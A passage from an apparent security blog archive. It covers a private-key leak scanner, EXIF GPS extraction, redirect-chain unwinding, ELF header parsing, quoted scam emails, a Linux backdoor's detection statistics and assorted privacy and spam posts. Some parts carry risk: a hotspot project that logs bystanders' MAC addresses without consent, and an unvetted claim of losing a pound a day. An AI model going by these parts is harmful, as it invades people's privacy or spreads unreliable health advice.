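    """Return the names of files in the package that contain PEM private key material
    or carry a key-like file name."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(strip_crx_header(package_bytes))) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if KEY_LIKE_NAME_RE.search(info.filename) or PRIVATE_KEY_RE.search(zf.read(info.filename)):
                hits.append(info.filename)
    return hits


# Constructed sample packages for the demonstration (file names, manifest text and the
# placeholder key body are made up; the "key" is not real key material).
FAKE_PEM = (b"-----BEGIN RSA PRIVATE KEY-----\n"
            b"placeholder-not-a-real-key\n"
            b"-----END RSA PRIVATE KEY-----\n")


def build_sample_package(include_key=True, as_crx=False):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("manifest.json", '{"name": "Sample Search Plugin", "version": "1.0"}')
        zf.writestr("background.js", "console.log('hello');")
        if include_key:
            zf.writestr("build/signing-key.pem", FAKE_PEM)
    payload = buf.getvalue()
    if as_crx:
        pubkey, sig = b"PUBKEYBYTES", b"SIGBYTES"   # dummy values, only the lengths matter
        payload = b"Cr24" + struct.pack("<III", 2, len(pubkey), len(sig)) + pubkey + sig + payload
    return payload
```

Run `find_private_keys` over every artifact a build produces, not just the one you intend to publish; the file in this incident was a build-time leftover, which is exactly what a name-based check catches even when the content check would not.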


Warning: CaffeineSecurity dotcom is not mine!

Just a warning to everyone: CaffeineSecurity.com was recently registered.

This site is NOT me.

The domain was registered through a privacy proxy, so it's hard to tell who actually owns it.

Do you test your Antivirus updates before deployment?

If your system uses Avira Antivirus, you probably won't be reading this post today.

According to ZDnet, an Avira Antivirus update today crippled millions of computer systems.

This isn't the first time an antivirus update has crippled Windows systems.  Back in 2010 McAfee pushed out a DAT update which misidentified svchost.exe on Windows XP as malware and sent computers into endless reboot cycles.

What can you do to help protect your organization against these disasters?  It's simple...test your software updates.  Even antivirus definition updates can cause catastrophic failures across your enterprise, so stage them: push each new definition set to a small pilot group of representative systems first, and release it to the rest of the enterprise only once those systems have been confirmed healthy.

And just in case something slips through the cracks...have a backup plan.  Are you prepared for a worst case scenario where every active computer system in your organization is unusable?  How do you keep your organization running?  How do you recover from something that widespread in a timely manner, and restore normal business functionality?  Keep these questions in mind, and as we always said in Boy Scouts..."Be Prepared."

Android for the Paranoid: Fake GPS

This is the first article in a series of articles highlighting applications for security conscious users.

Today we're going to take a look at an Android application called "Fake GPS".

First, why does "Fake GPS" qualify as a security application?

Many Android applications are "location aware", meaning the application may not only find out where you are, but also report this information to the developer and advertisers, and possibly even post this information publicly.  Another serious issue is that the Android camera embeds your GPS location in each photo's EXIF metadata when geotagging is enabled, which on many phones it is by default.  This means that when you post a photo online, anyone who downloads it can read exactly where it was taken, unless the site strips the metadata for you.

The solution to this problem is "Fake GPS".  When combined with the Android feature "Mock Location", this application allows you to trick your phone into thinking you're somewhere else.


The above photo appears to have been taken in Phoenix, Arizona.


And this photo appears to have been taken in Florida.

How can you see the embedded GPS coordinates?  With an EXIF viewer.

Here's the info for the first photo:

Fake GPS is very easy to use.  Simply use a scrollable/zoomable map and choose where you want the GPS coordinates to be set.  You can even go into the advanced options and have the GPS move in a random direction and speed.

So, if you're worried about applications tracking your every move through your phone's location services, I highly recommend Fake GPS.  Keep in mind that it only fools applications that read the location API; your carrier still knows which cell tower you're connected to.
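Here is what an EXIF viewer does to pull those coordinates out, as an added example that is not part of the original post: walk the JPEG marker segments to the APP1 "Exif" segment, parse the TIFF directory inside it, follow the pointer to the GPS sub-directory, and convert the degree/minute/second rationals plus the N/S and E/W reference tags to decimal degrees. The sample JPEG is constructed inside the block (marker segments and GPS tags only, no image data), and the Phoenix coordinates used in it are illustrative.

```python
import struct

# Added example: a minimal EXIF GPS reader. It walks the JPEG marker segments to the
# APP1 "Exif" segment, parses the TIFF directory inside it, follows the pointer to the
# GPS sub-directory, and converts the degree/minute/second rationals to decimal degrees.
GPS_IFD_POINTER = 0x8825
GPS_LATITUDE_REF, GPS_LATITUDE = 0x0001, 0x0002
GPS_LONGITUDE_REF, GPS_LONGITUDE = 0x0003, 0x0004
TYPE_ASCII, TYPE_LONG, TYPE_RATIONAL = 2, 4, 5


def _read_ifd(tiff, offset, e):
    """Return {tag: (type, count, raw 4-byte value field)} for the directory at offset."""
    (count,) = struct.unpack_from(e + "H", tiff, offset)
    entries = {}
    for i in range(count):
        tag, typ, n, raw = struct.unpack_from(e + "HHI4s", tiff, offset + 2 + 12 * i)
        entries[tag] = (typ, n, raw)
    return entries


def _value(tiff, entry, e):
    """Decode one directory entry. Values of 4 bytes or less live in the entry itself;
    anything larger is stored at the offset the entry points to."""
    typ, n, raw = entry
    if typ == TYPE_ASCII:
        data = raw[:n] if n <= 4 else tiff[struct.unpack(e + "I", raw)[0]:][:n]
        return data.rstrip(b"\0").decode("ascii")
    if typ == TYPE_LONG:
        return struct.unpack(e + "I", raw)[0]
    if typ == TYPE_RATIONAL:
        off = struct.unpack(e + "I", raw)[0]
        words = struct.unpack_from(e + "%dI" % (2 * n), tiff, off)
        return [(words[i], words[i + 1]) for i in range(0, 2 * n, 2)]
    raise ValueError("unsupported EXIF type %d" % typ)


def _dms_to_decimal(dms, ref):
    (d, dd), (m, md), (s, sd) = dms
    value = d / dd + (m / md) / 60 + (s / sd) / 3600
    return -value if ref in ("S", "W") else value


def exif_gps_from_tiff(tiff):
    """Return (latitude, longitude) in decimal degrees, or None if there is no GPS directory."""
    e = "<" if tiff[:2] == b"II" else ">"          # byte order mark: II = Intel, MM = Motorola
    (ifd0,) = struct.unpack_from(e + "I", tiff, 4)
    ifd0_entries = _read_ifd(tiff, ifd0, e)
    if GPS_IFD_POINTER not in ifd0_entries:
        return None
    gps = _read_ifd(tiff, _value(tiff, ifd0_entries[GPS_IFD_POINTER], e), e)
    lat = _dms_to_decimal(_value(tiff, gps[GPS_LATITUDE], e), _value(tiff, gps[GPS_LATITUDE_REF], e))
    lon = _dms_to_decimal(_value(tiff, gps[GPS_LONGITUDE], e), _value(tiff, gps[GPS_LONGITUDE_REF], e))
    return lat, lon


def exif_gps_from_jpeg(jpeg):
    """Scan JPEG marker segments for APP1/Exif and parse its TIFF payload."""
    pos = 2                                        # skip SOI (FF D8)
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):                 # EOI or start of scan: no metadata after this
            break
        (length,) = struct.unpack_from(">H", jpeg, pos + 2)
        body = jpeg[pos + 4:pos + 2 + length]
        if marker == 0xE1 and body.startswith(b"Exif\0\0"):
            return exif_gps_from_tiff(body[6:])
        pos += 2 + length
    return None


def build_sample_jpeg(lat_dms, lat_ref, lon_dms, lon_ref):
    """Constructed input: a JPEG stub (SOI, one APP1/Exif segment, EOI) with a GPS directory."""
    e = "<"
    ifd0_off = 8
    gps_off = ifd0_off + 2 + 12 + 4                # IFD0 holds one entry
    lat_data = gps_off + 2 + 4 * 12 + 4            # GPS IFD holds four entries
    lon_data = lat_data + 3 * 8                    # three RATIONALs of 8 bytes each
    tiff = b"II" + struct.pack(e + "HI", 42, ifd0_off)
    tiff += struct.pack(e + "H", 1)
    tiff += struct.pack(e + "HHII", GPS_IFD_POINTER, TYPE_LONG, 1, gps_off) + struct.pack(e + "I", 0)
    tiff += struct.pack(e + "H", 4)
    tiff += struct.pack(e + "HHI4s", GPS_LATITUDE_REF, TYPE_ASCII, 2, lat_ref.encode() + b"\0\0\0")
    tiff += struct.pack(e + "HHII", GPS_LATITUDE, TYPE_RATIONAL, 3, lat_data)
    tiff += struct.pack(e + "HHI4s", GPS_LONGITUDE_REF, TYPE_ASCII, 2, lon_ref.encode() + b"\0\0\0")
    tiff += struct.pack(e + "HHII", GPS_LONGITUDE, TYPE_RATIONAL, 3, lon_data)
    tiff += struct.pack(e + "I", 0)
    for dms in (lat_dms, lon_dms):
        for num, den in dms:
            tiff += struct.pack(e + "II", num, den)
    app1 = b"Exif\0\0" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"
```

The same walk over the marker segments is how you would strip the location before posting: drop the APP1 segment (or rewrite it without the GPS directory) and the coordinates are gone, whatever Fake GPS told the camera.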

Hacking Your Digital Camera

Not all hacking is bad.  Sometimes hacking can be used to enhance the features of a product rather than to perform malicious actions.

One of my hobbies is photography.  Today I downloaded the "Canon Hack Development Kit" (CHDK) for my Canon Powershot S2 IS.

After a couple wrong versions, I finally downloaded the correct version for my camera, and was up and running.

The way CHDK works is pretty ingenious.  It is loaded into the camera's RAM by tricking the camera into thinking it's loading a firmware update.  Rather than a permanent firmware update, though, CHDK is only loaded into memory, much like running an application on your computer or phone: power the camera off and on again and it's gone.

The features enabled with CHDK are pretty amazing.  My "point and shoot" camera now has some features which aren't available on my wife's professional camera, such as motion detection and long exposures of up to 64 seconds (some cameras allow exposures of up to 30 minutes!).

If you have a supported camera I highly encourage you to check it out.

My Letter to a Spammer

I decided to take the time to notify one of the businesses which has been spamming my blog with comments that I'm just not going to take it anymore.  Here is the letter in full.  Note that the company name is being withheld because I don't want them to get any more web traffic from my blog.


Hello,

This is to notify you that an unsolicited advertisement for your business was recently posted on my blog, Caffeine Security.

Please note that as a computer professional, I take spam seriously and it will not be tolerated.

Due to a recent increase in spam on my blog, I have implemented a new Terms of Use which I encourage you to review.  In short, any future unsolicited advertisements for your business will be subject to a $500 comment processing fee for each link posted.  Because your unsolicited advertisement was posted before this Terms of Use was in effect, any pre-existing advertisements are not subject to this processing fee.  However, all future unsolicited advertisements will be subject to this processing fee.  Third party advertising services and automated applications posting these comments on your behalf are considered your "agent", and accept these terms on your behalf.  If you do not wish to be subject to this fee in the future, I highly advise you discontinue unsolicited comment advertisements on blogs immediately.  If these advertisements are being posted by a 3rd party advertisement service, the recommended course of action is to notify this advertisement service immediately to discontinue unsolicited advertisements.

Thanks,

Ken
Caffeine Security

New Terms of Use - $500 Processing Fee for Comment Spam

Due to an increase in spam, I've had to add a Terms of Use page.

In summary, the Terms of Use for this site explicitly state that anyone posting an unsolicited advertisement in a comment agrees to a $500 comment processing fee for each link within the comment.  Comments which are not unsolicited advertisements are exempt from this fee.

The scammers just keep getting dumber...

Got this email today:
Good Day Dearest One Dear !! I am Madam.Sonia Zuru I am a widow being that I lost my husband,my husband was a serving director of the Cocoa exporting board until his death.He was assassinated by the rebels following the political uprising, before his death he made a deposit of Six Million Five Hundred Dollars ($ 6,500,000.00) here in Ouagadougou Burkina Faso in one of the Security Company,he intended to buy a Cocoa processing Machine with the fund.I want you to help me for us to retrieve this fund and transfer it to your account in your country or any safer place as you will be the beneficiary and recipient of the fund which we will use for joint investment in your country.I have plans to do investment in your country, like real estate and industrial production.This is my reason for writing to you. Please if you are willing to assist me and my only Daughter Linda Zuru, Telephone REMOVED Thanks and best regards . Madam Sonia Zuru
I've never priced a cocoa processing machine, but something tells me over $6 million is a little excessive. I'm also kinda disappointed. $6.5 million is pocket change compared to the scams I used to receive. I know the economy is tough right now, but it's not like these scammers are actually offering real money. Add a few more zeros to that and you might pique my interest.

Surely this is a legit lottery email and not a scam...

This email just showed up in my inbox...

Subject: .YOUR EM,AIL HAS WON,N
Date: Wed, 18 Apr 2012 20:55:19 +0200
It has finally come to our notice that you have not claimed your winning price. We want to verify if truly you are the owner of the email address that has won the 2012 Microsoft Email lottery draw. Because we have sent the winning notification to your address but you did not write back.

If you are the owner of the email address that has won the Email lottery, we advice you claim your winning price as quick as possible to avoid losing it, as the lottery program might come to an end within the next seven days or next week.

Best Regards.

Dr. Clinton W. E. Bateman (Coordinator M.S. Lotto)
Tel: +44-703-184-1863 +441212880874
EMAIL: infomsloto@mslot-agent.info.ms

Surely this is a legitimate email, right?

What if your hardware was infected with a virus?

It's becoming common again to see viruses infect the boot sector of a hard disk in order to survive on a system.  There have even been reports of viruses infecting the BIOS, capable of surviving a full hard-disk wipe.

But what if your actual hardware had an infection permanently programmed in?  It's not unheard of for consumer electronics such as digital photo frames to be manufactured and sold with malware installed at the factory.  What if the actual hardware design included a piece of malware designed to fail at a certain date/time or even phone home?

While the chances of this occurring are low, it's still a possibility.  Hardware modified that significantly would most likely be the deliberate work of a well funded, probably government backed, organization, with malware rivaling Stuxnet or Duqu.  Such an organization would need to do a lot more than infect a USB stick: it would need someone inside the manufacturing process to implement the hardware based malware.  This malware would be well beyond the complexity of Stuxnet or Duqu, as it would be written at the physical hardware layer and incorporated into the equipment.

The applications for such a piece of malware are very limited.  While espionage would be a likely candidate, it would be ill advised: any implant which "phoned home" from the physical layer could be spotted by network monitoring tools, and the hardware would be taken out of service.  Once researchers uncovered the physical "defect", a bulletin would be issued worldwide to discontinue use of that device.

A more likely application of hardware based malware would be sabotage.  Deliberately design a device to fail at a specified date/time.  Consider this scenario for a minute...what would happen if half the switches running the Internet backbone would fail simultaneously?  Communication would be severely crippled.  Then apply this one step further to hardware such as digitally controlled water pumps, generators, dam controls... Simultaneous failure of multiple components on a nationwide or global scale could have disastrous consequences.

Quality control processes make it fairly likely that such a modification would be caught at the manufacturer.  But if hardware based malware slipped past a manufacturer, or was introduced intentionally by a manufacturer under direction of its government, then once the hardware left the factory it would be nearly impossible to detect until it was too late.

Ultimately, this raises the question of "how well do you trust your manufacturers?"  Are you having a local, trusted manufacturer you've dealt with for years build your equipment, or do you outsource your manufacturing to the cheapest supplier overseas who you've never even met face-to-face?

In a world where best practices such as configuration management and configuration standardization are becoming key, a single piece of hardware based malware could turn that standardization into our downfall: every identical device would fail in the same way at the same time.

Unfortunately, much like Stuxnet and Duqu, it's no longer a question of "if" hardware based malware will appear, but "how soon"...

Warning: Potentially Malicious "Unfollow" Twitter App

Twitter users have recently begun receiving spam claiming to be an "unfollow app" capable of telling you who has stopped following you on Twitter.

Since this "app" is being advertised via spam, it should of course be treated as suspect.

The spam uses multiple redirects to fool scanners:

First Redirect Destination Analysis:  (Clean)
https://www.virustotal.com/url/7ad5fc516c4a9a4689de1e5de82c90681bb95f998c2ff1a0bfce180324d44fbb/analysis/1334255656/

Second Redirect Destination Analysis: (Potentially damaging content per Websense Threatseeker)
https://www.virustotal.com/url/dbfafb76973527e77be5e8e15f30ea7734b4a6cffed2d403c32fff16c69adf34/analysis/


At the very least, this is most likely a scam to get social networking impressions.  Chances are fairly high, however, that this could be malicious software.

If you receive any spam advertising this (or any other app), report the account to Twitter and they will deal with it accordingly.
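To see every hop in a chain like this, rather than only the first destination a scanner happens to check, an analyst can unwind the redirects by hand. The following is an added example, not part of the original post: it issues each request itself with no automatic redirect following, caps the number of hops so a redirect loop cannot hang it, and is demonstrated against a constructed local redirect chain that stands in for the spam links (the paths and the User-Agent string are assumptions).

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urljoin, urlsplit

# Added example: resolve a redirect chain one hop at a time so that every destination,
# not just the first, can be submitted to a scanner. No redirect is followed
# automatically, and the number of hops is capped to survive redirect loops.
REDIRECT_STATUSES = (301, 302, 303, 307, 308)


def follow_redirect_chain(url, max_hops=10):
    """Return the list of URLs visited, starting with url and ending at the first
    non-redirect response (or after max_hops redirects)."""
    chain = [url]
    for _ in range(max_hops):
        parts = urlsplit(url)
        conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
        conn = conn_cls(parts.hostname, parts.port, timeout=10)
        try:
            path = parts.path or "/"
            if parts.query:
                path += "?" + parts.query
            conn.request("GET", path, headers={"User-Agent": "redirect-unwinder/0.1"})
            resp = conn.getresponse()
            status, location = resp.status, resp.getheader("Location")
        finally:
            conn.close()
        if status not in REDIRECT_STATUSES or not location:
            break
        url = urljoin(url, location)      # Location may be relative
        chain.append(url)
    return chain


class _HopHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the spam links: /click -> /track -> /landing."""
    routes = {"/click": (302, "/track"), "/track": (301, "/landing")}

    def do_GET(self):
        if self.path in self.routes:
            status, target = self.routes[self.path]
            self.send_response(status)
            self.send_header("Location", target)
            self.end_headers()
        else:
            self.send_response(200)
            self.send_header("Content-Type", "text/plain")
            self.end_headers()
            self.wfile.write(b"landing page")

    def log_message(self, *args):      # silence per-request logging
        pass


def unwind_sample_chain():
    """Start the constructed server on a free localhost port, unwind the chain, shut down."""
    server = HTTPServer(("127.0.0.1", 0), _HopHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base = "http://127.0.0.1:%d" % server.server_address[1]
    try:
        return follow_redirect_chain(base + "/click")
    finally:
        server.shutdown()
        server.server_close()
```

Against a real spam link, run this from a throwaway network position and submit each URL in the returned list to VirusTotal separately; the intermediate trackers are often clean precisely so that the first hop, which is all a naive scan sees, looks harmless.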

I've been losing about 1 lb per day thanks to @ZipFizzCorp

I've been losing about a pound per day by slightly changing my diet and switching from soda to bottled water plus ZipFizz.

First, a little about me.  I'm a computer security professional, and rarely have time to leave my desk.  I don't exercise nearly as often as I should (barely ever), simply because I don't have the time.

For about a month now, I've changed my diet to try to lose weight, and it's working!  I recently started tracking my weight, and I'm losing about a pound per day.

I'm not going to lie, ZipFizz is not some miracle drug or anything of the sort...I did have to alter my diet as well as switch to ZipFizz.

My diet before ZipFizz:
I never have time to eat breakfast in the morning, because I've got to get to work and don't have time.  Because of this, I normally eat lunch around 11 am.

To keep me going during the day, I drink a lot of caffeine.  I was drinking two 20 oz sodas during the work day.  That's 550 calories, and 156g of carbohydrates.  That's 50% of your daily allowance for carbohydrates for a 2,000 calorie diet!

On top of all this, I normally eat a microwave meal at about 400 calories, 41 carbohydrates.  I usually have a bag of chips with my meal, so that's 160 more calories and 15g more carbohydrates.  Sometimes I'll even eat a mid-afternoon snack, doubling those values.

So, totaling all this up, I've consumed BEFORE I go home for dinner:
1270 calories (63.5% of daily allowance for 2,000 calorie diet)
212g carbohydrates (70% of daily allowance for 2,000 calorie diet)


Then when I got home, I would eat a large dinner with my wife, drink MORE soda, and greatly exceed the number of calories, carbs, and sugars I should be taking in.


Now:
I still don't have time to eat breakfast, so I still eat lunch around 11 am.

I switched from 2 sodas per day to 2 ZipFizz with bottled water per day.  That's 20 calories, and 4 carbohydrates total.  But I've still got the same amount of energy, and can keep going all day long without feeling tired.

I switched my microwave dinners to something with less calories, 350 calories instead of 550, but more carbohydrates (55g). I cut out the bag of chips with my meal.

Finally, I eliminated my afternoon snack and replaced it with "chewable adult multivitamins" which look like gummy bears, and taste "decent".  These have 50 calories, 11g carbohydrates.

Update: Added nutritional information for the multivitamins.

So now, during the day I'm consuming the following:
420 calories (21% of daily allowance for 2,000 calorie diet)
71g carbohydrates (24% of daily allowance for 2,000 calorie diet)

And the best part about it is, I haven't had to change how much I exercise or how much I eat for dinner. The only change I've made in the evenings is switching to diet soda instead of regular.

The weight loss has been slow but steady, and I feel healthier.

I encourage you to give ZipFizz a try as an alternative to coffee or soda, especially if you need to lose some weight.

You probably are questioning if ZipFizz paid me to type this blog post.  They didn't.  Ask them.
I wrote this blog post because like many people in the IT field, I have a weight problem, and I want to do something about it.  I want to help others do something about it.

Disclaimer: I'm not a physician, this is not medical advice, not responsible for what you do with this information.  Consult a doctor before making serious changes in your diet.

Sony BRAVIA TV Datagram Flooding Denial of Service

Here's an interesting vulnerability...

Who would have thought you'd need to worry about your TV being subject to an attack?

A vulnerability has been reported in Sony BRAVIA TV, which can be exploited by malicious people to cause a DoS (Denial of Service).

Source: Secunia Advisory SA48705

Project Beekeeper - A Mobile Honeypot Project

I'm proud to announce my latest research project, Project Beekeeper.

In this project I will be creating a mobile "hotspot" and taking it to public locations, keeping track of how many people connect at each location over a period of time.

I won't be scanning them when they connect, simply recording their system/phone name and MAC address, and collecting statistics.

I'll be using a rooted HTC T-Mobile G1 running Android 1.6, which is no longer connected to a wireless carrier.

This will all be made possible by Barnacle Wifi Tether, a great piece of software which is available on Google Play.

Why am I in Computer Security? Ask the U.S. Commerce Department

Should we ever get to the point where the computers we use present more risk than provide value, it will undoubtedly be time to unplug them.

I could write a very lengthy article on why I am in the computer security field.  But I'm not going to.

Instead, I'm going to link to a news article about the U.S. Commerce Department's Economic Development Administration.  This is what I want to help prevent from happening. 

Computer Virus Plunges Government Agency Into Dark Ages

How to Mitigate Anonymous' Internet Shutdown March 31

In case you haven't heard, Anonymous plans to shutdown the internet March 31 to protest a multitude of issues which I'm not going to bother to get into right now.

The plan is to attack all 13 root DNS servers with Denial of Service (DoS) attacks.  (Strictly speaking there are 13 root server addresses; each one is served by many anycast instances spread around the world, which makes them far harder to take down than the number suggests.)

Even if all 13 were shut down, the effect would not be immediate: recursive resolvers cache the top-level domain delegations they learn from the root servers, typically for up to 48 hours, so DNS queries would only begin to fail as those cached entries expired.

Their plan is pretty bold, and will require a tremendous number of computer systems attacking at once.

While it is unknown if Anonymous' plan can succeed, there are a few things you can do to mitigate this threat from affecting your organization.

1) Don't panic. This shutdown is on a Saturday, so the number of employees this affects will be minimal.  If your organization isn't even open on Saturdays, then this won't affect your organization at all.

2) If you are open on Saturday, consider putting one of your local DNS servers in caching mode if it isn't already, and raising the minimum cache time to live (TTL) to 86400 seconds (24 hours) so that commonly used names stay cached throughout the attack.  Check that your resolver can actually do this: Unbound's cache-min-ttl option forces a minimum TTL, whereas BIND's max-cache-ttl only caps TTLs from above.  It's a good idea to revert to your original settings Monday morning.

3) Finally, if you absolutely must have access to certain websites with static IP addresses, such as business partners or suppliers, consider making available to your on-call support staff a hosts file with critical domain names and IP addresses pre-loaded, so that they can drop this file on any organizational systems which start to have DNS problems.  Once again, revert to your original settings Monday morning.

These three simple tips should help keep your organization up and running, should Anonymous actually succeed in taking down one or more root DNS servers.

For home users, I would recommend checking your local weekend weather forecast Friday evening.  If it's going to be nice out, be ready to go outside for a change, get some exercise and have some fun.  If not, consider breaking out some board games for the kids, or find yourself a nice book to read.  It's only one day, if it even happens, and it's not the end of the world.

Executable and Linkable Format (ELF) Guide

Yesterday I found a very handy guide for understanding Linux ELF files.  Great for malware analysis!

Thought I would share it with everyone else.

http://www.acsu.buffalo.edu/~charngda/elf.html
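As an added example to go with that guide (not from the guide itself), here is a hand-rolled parser for the ELF file header, which is the first thing to read when triaging an unknown Linux binary. The field layout is the one the ELF specification defines; the sample header bytes are constructed, and the "suspicious" checks are my own triage rules of thumb rather than anything from the guide.

```python
import struct

# Added example: parse the fixed-size ELF header by hand, the first step in triaging
# an unknown Linux binary. Field layout follows the ELF specification; the sample
# header bytes below are constructed, not taken from a real sample.
ELF_MAGIC = b"\x7fELF"
E_TYPE = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}
E_MACHINE = {0x03: "x86", 0x28: "ARM", 0x3E: "x86-64", 0xB7: "AArch64"}


def parse_elf_header(data):
    """Return the e_ident facts and the numeric header fields as a dict; ValueError if not ELF."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unknown ELF class or byte order")
    e = "<" if ei_data == 1 else ">"
    # After the 16-byte e_ident: type, machine, version, entry, phoff, shoff, flags,
    # ehsize, phentsize, phnum, shentsize, shnum, shstrndx. Only the widths of
    # entry/phoff/shoff differ between ELF32 (I) and ELF64 (Q).
    fmt, size = (e + "HHIQQQIHHHHHH", 64) if ei_class == 2 else (e + "HHIIIIIHHHHHH", 52)
    if len(data) < size:
        raise ValueError("truncated ELF header")
    fields = struct.unpack_from(fmt, data, 16)
    names = ("type", "machine", "version", "entry", "phoff", "shoff", "flags",
             "ehsize", "phentsize", "phnum", "shentsize", "shnum", "shstrndx")
    hdr = dict(zip(names, fields))
    hdr["class"] = 64 if ei_class == 2 else 32
    hdr["endian"] = "little" if ei_data == 1 else "big"
    hdr["type"] = E_TYPE.get(hdr["type"], hex(hdr["type"]))
    hdr["machine"] = E_MACHINE.get(hdr["machine"], hex(hdr["machine"]))
    return hdr


def suspicious_header_features(hdr):
    """Header oddities worth a second look when triaging a sample."""
    notes = []
    if hdr["shnum"] == 0 or hdr["shoff"] == 0:
        notes.append("section header table stripped")
    if hdr["ehsize"] != (64 if hdr["class"] == 64 else 52):
        notes.append("e_ehsize does not match ELF class")
    if hdr["phnum"] == 0 and hdr["type"] in ("EXEC", "DYN"):
        notes.append("no program headers in a loadable file")
    return notes


def build_sample_header():
    """Constructed ELF64 little-endian x86-64 executable header with section headers stripped."""
    e_ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\0" * 8   # class=64, data=LSB, version=1, OS ABI=SysV
    return e_ident + struct.pack("<HHIQQQIHHHHHH",
                                 2, 0x3E, 1, 0x400400, 64, 0, 0,
                                 64, 56, 2, 64, 0, 0)
```

A stripped section header table is what makes tools such as objdump go quiet on a sample; the program headers, which the loader actually uses, are still there, so that is where the analysis continues.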

Facebook Location Sharing Enabled by Default - Another Threat to your Privacy and Safety

I noticed something disturbing today.  Ever since about the 15th of March (I noticed this on some of my friends' posts going back to the 13th), my Facebook posts have started including my location.  That's pretty disturbing, because I never enabled Facebook to share my location.  It would seem Facebook has enabled this setting by default.

In fact, if I wanted everyone to know where I am, I would have typed my location in my Facebook post.

This really becomes problematic if I were to use Facebook while on vacation.  Suddenly my posts will tell everyone I'm not home, and depending on my privacy settings, that's pretty much telling the world "hey, he's on vacation, go steal stuff from his house!".

I've noticed most of my friends posts are including this information as well.

Facebook does provide instructions on disabling location sharing (https://www.facebook.com/about/location) but it's not very clear if these settings stick.

I urge you the next time you post on Facebook, check to see if there is a small gray box below your post which includes your approximate location.  If there is, click the X inside that box to disable location sharing.

Share this message with your friends and family on Facebook, and help them be safe online too!

Flash Farce: The Dangers of Social Media Influencing Real World Actions

We're lucky it hasn't happened yet.  Or maybe it has and we don't know it.

We've all heard how "flash mobs", protests such as "Occupy Wall Street", and even revolutions such as Arab Spring can be organized through social media such as Twitter or Facebook.

Viral videos, trending Twitter hash tags, Change.org petitions, Facebook pages...all of these are "tools" used to help bring about social change.

But how many people actually check the origins of a social change campaign or movement? And would it even do them any good?  How would anyone know the true origins, or motivations, behind an online campaign?

Linux Processes – Memory Layout, exit, and _exit C Functions

This is a great article from TheGeekStuff.com.  Very relevant for those who analyze Linux malware.

"In this article, we will discuss about the memory layout of a process and the process terminating C functions."

Linux Processes – Memory Layout, exit, and _exit C Functions

Hutizu/Huituzi - Follow the Gray Rabbit

Typing Huituzi (the Chinese phonetic spelling originally found in .ssyslog) into Google Translate's phonetic input for Chinese produces 灰兔子, which means "Gray Rabbit".

So, we now know the name of this amazing piece of malware.

According to Wikipedia, in Chinese literature, rabbits accompany Chang'e (the Chinese moon goddess) on the Moon. Also associated with the Chinese New Year (or Lunar New Year), rabbits are also one of the twelve celestial animals in the Chinese Zodiac for the Chinese calendar.

A very interesting note: This malware was discovered in 2011 - the Chinese year of the Metal Rabbit, or "Jīnshǔ tù" (金属兔).

The question remains - how deep does this rabbit hole go?

I'm updating all of my .ssyslog posts to include "Hutizu" since that is the official detection name.

Hutizu and Linux/Bckdr-RKC Detection Statistics

Let's take a look at current detection statistics for Linux/Bckdr-RKC.
The newer variant has been named the Hutizu backdoor by Antivirus vendors.

.xsyslog - The original file placed on my honeypot.
Commonly known as Linux/Bckdr-RKC or Linux/PKC

Metascan:
1/25 detection http://www.metascan-online.com/results/ue9v7uz2yv9wvb36mdwr2s9hg3hss792
Fortinet detects as Linux/PKC.A!tr.bdr

VirusTotal:
0/43 detection https://www.virustotal.com/file/ce62318acfb28e7ad5c915b0bb7cbc256b5c682097d33d1a002ff856b21d7324/analysis/1332284106/ 

VirScan:
3/36 detection http://r.virscan.org/report/a6769c90a8c3d519201c6cdee60eea5b.html 
Fortinet detects as Linux/PKC.A!tr.bdr
Kaspersky detects as Backdoor.Linux.PKC.a

Sophos detects as Linux/Bckdr-RKC


.ssyslog - The newer variant
Commonly known as "Hutizu"

Metascan:
3/25 detection http://www.metascan-online.com/results/szab3gp39d91byh3z3ebuz64utld97m0
ArcaVir detects as Linux.Hutizu.a
Fortinet detects as Linux/Hutizu.A!tr.bdr
Ikarus detects as Backdoor.Linux.Hutizu

VirusTotal:
7/43 detection https://www.virustotal.com/file/414a142016cab43d85c7b85a61426f0d3e3c2e04b9c3a9b94d88925593aaf49b/analysis/1332284644/ 
Comodo detects as UnclassifiedMalware
Emsisoft detects as Backdoor.Linux.Hutizu!IK
Fortinet detects as Linux/Hutizu.A!tr.bdr
Ikarus detects as Backdoor.Linux.Hutizu
Jiangmin detects as Backdoor/Linux.ab
Kaspersky detects as Backdoor.Linux.Hutizu.a
Sophos detects as Linux/Hutizu-A

VirScan:
8/36 detection http://r.virscan.org/report/dac52b25964a8614bb02e119e828575c.html
a-squared detects as Backdoor.Linux.Hutizu!IK
ArcaVir detects as Linux.Hutizu.a
Comodo detects as UnclassifiedMalware
Fortinet detects as Linux/Hutizu.A!tr.bdr
Ikarus detects as Backdoor.Linux.Hutizu
Jiangmin detects as Backdoor/Linux.ab
Kaspersky detects as Backdoor.Linux.Hutizu.a
Sophos detects as Linux/Hutizu-A

This is good news, as it means anti-virus vendors are starting to detect this malware.

But the bad news is, only a small fraction of AV vendors are detecting it!

Hutizu Under the Hood

I've been looking at the strings output of .ssyslog, which is now detected by a small number of AV vendors as "Hutizu".

http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/ssyslog/ssyslog-strings.txt

A few interesting items jumped out at me.


Mario 2012 - Help Raise Awareness!

Mario 2012 is a film and campaign by Caffeine Security that aims to make Mario the plumber famous, not to celebrate him, but to raise support for his arrest.

Please watch the video, and support this awareness campaign!

Linux/Bckdr-RKC Delivery Method Analyzed

You can tell a lot about an attacker based upon their methods of attack.
-Automated attacks happen rapidly, with no time for typing
-Manual attacks happen slowly, as the attacker has to type commands
-Typos and misspellings indicate a manual attack
